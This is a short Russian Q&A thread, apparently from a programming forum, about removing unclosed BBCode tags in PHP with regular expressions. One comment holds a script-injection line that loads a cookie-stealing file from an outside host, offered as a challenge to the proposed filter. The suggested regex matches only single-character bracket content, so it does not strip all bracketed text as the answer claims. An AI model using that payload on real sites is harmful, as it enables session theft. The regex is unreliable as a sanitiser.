# Фильтрация BB кодов

Tags: php, bbcode

Как написать BB коды? Знаю это легко, но вот про6лема: когда пишешь `[B]тест[/B]`, все в порядке, а когда `[B]тест...`, то весь текст жирный. Как сделать фильтрацию, что6ы если есть `[B]`, но нету `[/B]`, то `[B]` удалялась с текста? Или выдавало ошибку: закончите тэг.

Comment: На уровне идеи: регулярным выражением подсчитать количество открытых тегов минус количество закрытых тегов. Если чего не хватило - дописать.

Answer (score 2):

1. сделать замену по регулярному выражению для всех парных тэгов.
2. удалить все, что не прошло автозамену.

Последний пункт, например, так:

```
preg_replace('/\[[^\[\]]\]/','',$str);
```

То бишь, удаляем все квадратные скобочки и все, что между ними

Comment: [script src="http://mysite.com/stealcook.js"][/script]

Comment: ага. Этот радостно преобразуется, если тэг скрипт разрешен, либо уничтожится, если запрещен